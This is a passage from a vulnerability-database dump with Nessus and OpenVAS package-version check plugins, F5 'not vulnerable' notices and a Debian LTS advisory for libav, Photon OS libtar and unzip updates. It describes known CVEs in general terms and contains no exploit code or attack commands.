extracted from VMware Security Advisory PHSA-2018-2.0-0029. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121929);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2013-4420\");\n\n script_name(english:\"Photon OS 2.0: Libtar PHSA-2018-2.0-0029\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libtar package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-29.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4420\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libtar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-1.2.20-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-debuginfo-1.2.20-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-devel-1.2.20-5.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtar\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T12:51:50", "bulletinFamily": "scanner", "description": "An update of the unzip package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0013_UNZIP.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121657", "title": "Photon OS 1.0: Unzip PHSA-2016-0013", "type": "nessus", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0013. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121657);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2015-7696\", \"CVE-2015-7697\");\n\n script_name(english:\"Photon OS 1.0: Unzip PHSA-2016-0013\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the unzip package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-13.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2774\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:unzip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-debuginfo-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-debuginfo-6.0-7.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unzip\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T04:51:48", "bulletinFamily": "scanner", "description": "Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of 
service\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2 function\nin libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided. As\na result, the variable 'item_num' turned negative, bypassing the check\nfor a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "DEBIAN_DLA-1654.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121622", "title": "Debian DLA-1654-1 : libav security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1654-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121622);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 9:34:54\");\n\n script_cve_id(\"CVE-2014-8542\", \"CVE-2015-1207\", \"CVE-2017-14169\", \"CVE-2017-14223\", \"CVE-2017-7863\", \"CVE-2017-7865\");\n script_bugtraq_id(70881);\n\n script_name(english:\"Debian DLA-1654-1 : libav security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of service\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had 
an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2 function\nin libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided. As\na result, the variable 'item_num' turned negative, bypassing the check\nfor a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/02/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libav\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra-56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter5\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libav-dbg\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-doc\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-tools\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra-56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice55\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter5\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"libavresample2\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil54\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale3\", reference:\"6:11.12-1~deb8u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-02-16T04:37:03", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-11T23:55:00", "published": "2019-02-11T23:55:00", "id": "F5:K07052904", "href": "https://support.f5.com/csp/article/K07052904", "title": "PHP vulnerability CVE-2015-3307", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:04", "bulletinFamily": "software", "description": "\nF5 Product Development has 
evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-07T23:23:00", "published": "2019-02-07T23:23:00", "id": "F5:K19916307", "href": "https://support.f5.com/csp/article/K19916307", "title": "glibc vulnerability CVE-2015-1473", "type": "f5", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:02", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T20:03:00", "published": "2019-02-05T20:03:00", "id": "F5:K54423555", "href": "https://support.f5.com/csp/article/K54423555", "title": "PHP vulnerability 
CVE-2015-4147", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:17", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T19:33:00", "published": "2019-02-05T19:33:00", "id": "F5:K41036924", "href": "https://support.f5.com/csp/article/K41036924", "title": "Linux kernel vulnerability CVE-2014-7843", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-16T04:37:16", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated 
documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T19:26:00", "published": "2019-02-05T19:26:00", "id": "F5:K75269595", "href": "https://support.f5.com/csp/article/K75269595", "title": "QEMU vulnerability CVE-2015-5166", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-02-07T01:57:13", "bulletinFamily": "unix", "description": "Package : libav\nVersion : 6:11.12-1~deb8u5\nCVE ID : CVE-2014-8542 CVE-2015-1207 CVE-2017-7863 CVE-2017-7865 \n CVE-2017-14169 CVE-2017-14223\n\n\nSeveral security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\n libavcodec/utils.c omitted a certain codec ID during enforcement of\n alignment, which allowed remote attackers to cause a denial of service\n (out-of-bounds access) or possibly have unspecified other impact via\n crafted JV data.\n\nCVE-2015-1207\n\n Double-free vulnerability in libavformat/mov.c allowed remote\n attackers to cause a denial of service (memory corruption and crash)\n via a crafted .m4a file.\n\nCVE-2017-7863\n\n libav had an out-of-bounds write caused by a heap-based buffer\n overflow related to the decode_frame_common function in\n libavcodec/pngdec.c.\n\nCVE-2017-7865\n\n libav had an out-of-bounds write caused by a heap-based buffer\n overflow related to the ipvideo_decode_block_opcode_0xA function in\n libavcodec/interplayvideo.c and the avcodec_align_dimensions2\n function in libavcodec/utils.c.\n\nCVE-2017-14169\n\n In the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\n integer signedness error might have occurred when a crafted file,\n claiming a large "item_num" field such as 0xffffffff, was provided.\n As a result, the variable "item_num" turned negative, bypassing the\n check for a large value.\n\nCVE-2017-14223\n\n In libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\n lack of an EOF (End of 
File) check might have caused huge CPU\n consumption. When a crafted ASF file, claiming a large "ict" field in\n the header but not containing sufficient backing data, was provided,\n the for loop would have consumed huge CPU and memory resources, since\n there was no EOF check inside the loop.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-02-06T12:42:33", "published": "2019-02-06T12:42:33", "id": "DEBIAN:DLA-1654-1:B472E", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201902/msg00005.html", "title": "[SECURITY] [DLA 1654-1] libav security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-02-07T18:17:33", "bulletinFamily": "scanner", "description": "Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of ervice\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function 
in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2\nfunction in libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large ", "modified": "2019-02-07T00:00:00", "published": "2019-02-06T00:00:00", "id": "OPENVAS:1361412562310891654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891654", "title": "Debian LTS Advisory ([SECURITY] [DLA 1654-1] libav security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891654\");\n script_version(\"$Revision: 13517 $\");\n script_cve_id(\"CVE-2014-8542\", \"CVE-2015-1207\", \"CVE-2017-14169\", \"CVE-2017-14223\", \"CVE-2017-7863\", \"CVE-2017-7865\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1654-1] libav security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-06 00:00:00 +0100 (Wed, 06 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/02/msg00005.html\");\n\n 